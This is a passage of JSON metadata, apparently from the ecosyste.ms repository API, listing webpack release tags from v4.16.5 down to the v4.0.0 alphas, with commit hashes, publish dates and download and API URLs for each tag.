","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH